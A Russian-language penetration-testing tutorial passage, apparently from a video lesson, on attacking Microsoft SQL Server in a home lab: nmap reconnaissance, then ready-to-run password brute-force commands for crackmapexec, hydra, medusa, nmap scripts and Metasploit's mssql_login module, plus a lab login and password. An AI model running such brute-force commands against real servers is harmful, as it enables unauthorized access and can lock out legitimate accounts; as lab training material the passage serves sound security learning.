Эксплуатация

Чтобы потренироваться с домашней лабораторией без возникновения проблем, рекомендую вам использовать ту же операционнку и ПО, а также выполнить настройки, которые вы видите на экране.

  1. Для начала пропингуем нашу лабораторную тачку и проведем первоначальную разведку:

$ nmap --script ms-sql-info,ms-sql-ntlm-info -sT -sV -p 445,1433 192.168.100.14

  1. Выполним атаку на подбор пароля, если у нас его нет. Но будьте осторожны, существует риск заблокировать учетные записи:

Можно использовать изобилие инструментов, готовые команды продемонстрированы на экране:

  1. crackmapexec mssql <IP> -d <Имя домена> -u usernames.txt -p passwords.txt
  2. hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
  3. medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
  4. nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host>
  5. В качестве альтернативы используйте данный модуль в msf:

msf> use auxiliary/scanner/mssql/mssql_login

Если у вас есть домен, установите это значение через команду set DOMAIN и используйте USE_WINDOWS_AUTHENT установленный в true, к слову это параметры из текущего модуля mssql в metasploit

set rhosts <ip> также установите адрес атакуемой машины

set pass_file /usr/share/wordlists/rockyou.txt словарик с паролями, для примера это рокью

set stop_on_success yes параметр остановки атаки в случае если скрипт обнаружит валидную пару логин/пароль

set threads 100 и количество потоков можете выставить этот параметр вариативно

3.1) Если мы рассматриваем нашу лабу, то этот же модуль метасплоита поможет нам проверим подключение из Metasploit Framework:

**msf>** use auxilary/scanner/mssql/mssql_login **msf>** set RHOSTS 192.168.100.14 msf> set USERNAME reporting msf> set PASSWORD PcwTWTHRwryjc$c6 **msf>** set DOMAIN querier

**msf>** set USE_WINDOWS_AUTHENT true